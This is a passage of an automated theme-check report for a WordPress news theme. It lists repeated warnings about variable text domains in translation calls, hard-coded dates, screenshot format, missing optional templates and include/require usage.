variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. 3307: 'desc' => __('This option for upgrading from the older versions 4.8.4 and lower to thPossible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. 3336: 'title' => __('Theme Information 1', $mom_textdomain),Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. 3342: 'title' => __('Theme Information 2', $mom_textdomain),Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $theme_text_domain found in translation function in plugins.php. Translation function calls should not contain PHP variables. Possible variable $theme_text_domain found in translation function in plugins.php. Translation function calls should not contain PHP variables. Possible variable $theme_text_domain found in translation function in plugins.php. Translation function calls should not contain PHP variables. Possible variable $theme_text_domain found in translation function in plugins.php. Translation function calls should not contain PHP variables. Possible variable $theme_text_domain found in translation function in plugins.php. Translation function calls should not contain PHP variables. Possible variable $theme_text_domain found in translation function in plugins.php. Translation function calls should not contain PHP variables. Possible variable $theme_text_domain found in translation function in plugins.php. Translation function calls should not contain PHP variables.
  13. CSS files : Presence of text domainText Domain: is missing from your style.css header.
  14. Date and time implementation : Use of the_time()At least one hard coded date was found in the file news-elements.php. Function get_option( 'date_format' ) should be used instead.At least one hard coded date was found in the file posts-widget.php. Function get_option( 'date_format' ) should be used instead.At least one hard coded date was found in the file reviews.php. Function get_option( 'date_format' ) should be used instead.At least one hard coded date was found in the file ajax-full.php. Function get_option( 'date_format' ) should be used instead.At least one hard coded date was found in the file nb-sm.php. Function get_option( 'date_format' ) should be used instead.At least one hard coded date was found in the file ajax-search.php. Function get_option( 'date_format' ) should be used instead.At least one hard coded date was found in the file momizat_functions.php. Function get_option( 'date_format' ) should be used instead.At least one hard coded date was found in the file goodnews.php. Function get_option( 'date_format' ) should be used instead.At least one hard coded date was found in the file search.php. Function get_option( 'date_format' ) should be used instead.
  15. Screenshot : Screenshot fileScreenshot size is 880x660px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred.Bad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  2. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  3. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  4. Optional files : Presence of category template file category.phpThis theme does not contain optional file category.php.
  5. Optional files : Presence of tag template file tag.phpThis theme does not contain optional file tag.php.
  6. Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
  7. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  8. Use of includes : Use of include or requireThe theme appears to use include or require : twitter-widget.php 42: require_once(MOM_FW . '/inc/twitterAPi/TwitterAPIExchange.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : timthumb.php 25: if( file_exists(dirname(__FILE__) . '/timthumb-config.php')) require_once('timthumb-config.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : main.php 41: include_once( ABSPATH . 'wp-admin/includes/plugin.php' ); // for use is_plu80: require_once($locale_file);87: require_once($locale_file);94: require_once( MOM_FW . '/menus/menu.php' );106: require_once( MOM_FW . '/options/redux/ReduxCore/framework.php' );107: //require_once( MOM_FW . '/options/redux/sample/sample-config.php' );110: require_once( MOM_FW . '/options/theme_options.php' );386: require_once($locale_file);393: require_once($locale_file); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : index.php 3: require_once('TwitterAPIExchange.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class-demos.php 156: include_once( ABSPATH . WPINC . '/class-http.php' );206: require_once( ABSPATH . 'wp-admin/includes/image.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : addons.php 478: include(MOM_ADDON . '/pages/system-status.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : auto-updates.php 29: require_once('class-pixelentity-theme-update.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class-pixelentity-theme-update.php 33: require_once('class-envato-protected-api.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : theme_options.php 89: require_once( ABSPATH .'/wp-admin/includes/file.php' );231: require_once(ABSPATH . '/wp-admin/includes/file.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : field_button_set.php 46: * ['format'] string Formatting options for paginate fields. Options include ('currency','nice','niceShort','timeAgoInWords' or a valid Date() f If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : extension_customizer.php 749: require_once( $class_file ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : welcome.php 378: require_once 'views/about.php';393: require_once 'views/changelog.php';408: require_once 'views/extensions.php';424: require_once 'views/support.php';439: require_once 'views/credits.php';454: require_once 'views/status_report.php'; If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : framework.php 410: require_once 'core/dashboard.php';414: require_once 'core/newsflash.php';1705: require_once 'core/enqueue.php';2852: require_once 'core/enqueue.php';2910: require_once 'core/panel.php';3249: require_once 'core/panel.php'; If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : social-counters.php 14: require_once( MOM_FW .'/inc/twitterAPi/TwitterAPIExchange.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class.theme-modules.php 227: include_once(ABSPATH . 'wp-includes/pluggable.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class.theme-modules.php 221: include_once(ABSPATH . 'wp-includes/pluggable.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes